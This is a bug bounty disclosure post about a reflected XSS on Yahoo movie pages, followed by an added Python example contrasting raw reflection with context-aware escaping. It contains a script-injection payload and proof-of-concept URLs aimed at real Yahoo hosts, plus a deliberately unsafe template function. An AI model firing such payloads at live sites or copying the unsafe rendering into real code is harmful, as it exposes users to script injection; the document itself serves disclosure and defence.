Hello guys, this is Shahzada Al Shahriar Khan.
I am from Bangladesh, and I am a newbie in bug bounty. :P
Well, now I will share how I found a Reflected Cross-Site Scripting (XSS) in the main domain & a subdomain of Yahoo.
Vulnerable URLs:
https://www.yahoo.com/movies/film/[*]
https://ca.yahoo.com/movies/film/[*]
Payload:
"><%2fscript><script>alert(document.domain)<%2fscript>
PoC URL:
https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
PoC Screenshot: Yahoo Canada Subdomain
Timeline:
Aug 12th - I submitted the report.
Aug 15th - Triaged the report & rewarded me a $300 initial bounty.
Aug 16th - Bug resolved.
Aug 24th - Another $400 bounty rewarded, total bounty is $700.
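
A defender's view of the payload above, as an added example that is not part of the original post and not Yahoo's code. It assumes the film path segment was percent-decoded and reflected raw into an HTML attribute and an inline script (the post does not say which context was involved); the template markup and function names are hypothetical.

```python
import html
import json
from urllib.parse import unquote

# Last path segment exactly as it appears in the post's PoC URL.
PAYLOAD_SEGMENT = '"><%2fscript><script>alert(document.domain)<%2fscript>'


def film_slug(path: str) -> str:
    """Return the decoded last path segment, as a router would hand it to a template."""
    # Routing splits on literal "/", so "%2f" stays inside the segment and
    # only becomes "/" once the segment is percent-decoded.
    return unquote(path.rsplit("/", 1)[-1])


def render_unsafe(slug: str) -> str:
    """Assumed vulnerable template: raw reflection into an attribute and a script block."""
    return (
        f'<meta property="og:url" content="/movies/film/{slug}">\n'
        f'<script>var film = "{slug}";</script>'
    )


def js_string(value: str) -> str:
    """Encode value as a JS string literal that is safe inside an inline <script>."""
    # json.dumps escapes quotes and backslashes; "<", ">" and "&" are escaped too,
    # so the HTML parser never sees "</script>" or "<!--" inside the literal.
    out = json.dumps(value)
    for ch in "<>&":
        out = out.replace(ch, f"\\u{ord(ch):04x}")
    return out


def render_safe(slug: str) -> str:
    """Same template with encoding chosen per output context."""
    return (
        f'<meta property="og:url" content="/movies/film/{html.escape(slug, quote=True)}">\n'
        f'<script>var film = {js_string(slug)};</script>'
    )


if __name__ == "__main__":
    slug = film_slug("/movies/film/" + PAYLOAD_SEGMENT)
    print(render_unsafe(slug))
    print(render_safe(slug))
```

The encoding is applied after decoding and at the point of output, so an encoded slash in the path gets no special treatment and never reaches the page as markup.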